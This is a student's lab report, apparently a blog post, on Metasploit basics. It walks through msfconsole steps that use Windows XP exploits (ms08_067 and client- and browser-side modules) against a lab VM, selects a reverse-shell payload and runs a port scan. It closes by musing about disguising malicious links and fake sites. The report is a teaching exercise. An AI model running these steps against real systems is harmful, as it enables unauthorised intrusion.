Exp5 MSF基础应用
Exp5 MSF基础应用
20154316 王帅峰
一、基础问题回答
(1)用自己的话解释什么是 exploit , payload , encode.
exploit: 设相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。
payload: 将病毒代码包装成一个可执行的文件或者其他的类型的文件,然后通过管道传输进去后开始为我们控制靶机服务。
encode: 针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。
二、实践过程
1.本次试验共分为以下四个部分:
-
1.1 一个主动攻击实践:
ms08_067
-
1.2 一个针对浏览器的攻击:
ms10_046
-
1.3 一个针对客户端的攻击:
ms10_087
-
1.4 成功应用任何一个辅助模块:
scanner/sip/options_tcp
实验环境:攻击机:kali
192.168.126.129
靶机:win XP
192.168.126.130
2.主动攻击:ms08_067
2.1 查看两台主机的IP地址:
kali:
Windows xp:
2.2 kali主机键入search ms08_067
查看漏洞信息
2.3 然后键入show payloads
看一下我们需要的payload
此处我们键入set payload generic/shell_reverse_tcp
选择病毒模块
show options
查看需要的信息,进行相应设置
2.4 键入show targets
查看适用的靶机版本,可以set target 0
自动选择
2.5设置好以后就可以键入exploit
开始进行攻击了
这时我们就可以查看Windows主机的设置信息等,输入systeminfo
查看主机信息:
输入ipconfig
可以看到Windows主机的IP地址:
3. 一个针对浏览器的攻击
3.1 然后在msf中键入search ms11_046
3.2 然后还是和上一个漏洞攻击操作步骤类似,键入use expliot/windows、...
上图中的名字
3.3 键入show options
查看需要修改的信息
3.4 检查一下攻击模块的信息无误,然后exploit
攻击
3.5 WinXP主机访问生成的网址,结果中毒了,转到了相应的地址。
3.6 此时kali主机可以键入sessions
查看了访问资源的数量
3.7 kali主机键入sessions -i 1
选择要攻击的目标主机,此处序号只能选1了
如图攻击成功,获取winxp的IP地址等信息
4. 一个针对客户端的攻击,ms10_087
4.1 跟之前的类似,先进行搜索这个漏洞,然后键入show options
的时候,对一些信息进行修改,键入exploit
进行监听。
4.2 在相应的地址找到生成的文件
4.3 将生成的文件拷贝到winxp主机,可伴随记事本运行。
5.成功应用任何一个辅助模块,scanner/portscan/tcp
这是一个针对tcp端口进行扫描的工具
5.1 键入show auxiliary
查看辅助模块,选tcp端口扫描工具
5.2 查看一下需要修改的参数,然后run
运行就可以
三、实践总结与体会
这次实验总体来说不是很难理解,操作起来也颇有乐趣,体会到了类似现实生活中的恶意链接等不拘好心的行为,对Windows系统的安全漏洞感到了恐怖,虽然只是xp系统,但由此可以看出Windows的安全隐患肯定还是存在的,没想到我们每天都在用的系统有这么多安全隐患,防患于未然,学好网络攻防对自己的帮助真的很大,经常检查自己的电脑,希望以后电脑系统能做的更好一点,有一个更加安全的网络虚拟环境。
四、离实战还缺些什么技术或步骤?
- 1.技术还不够熟练,理解还太浅薄了,msf里面好多payload都不会运用
- 2.知道对方的IP地址还是一个问题,只有在知道他IP地址才能做出入侵。
- 3.对病毒等恶意链接进行包装,将假的网站包装成像真的一样,易于上钩。
posted on 2018-04-24 21:14 wangshuaifeng 阅读(205) 评论(0) 编辑 收藏 举报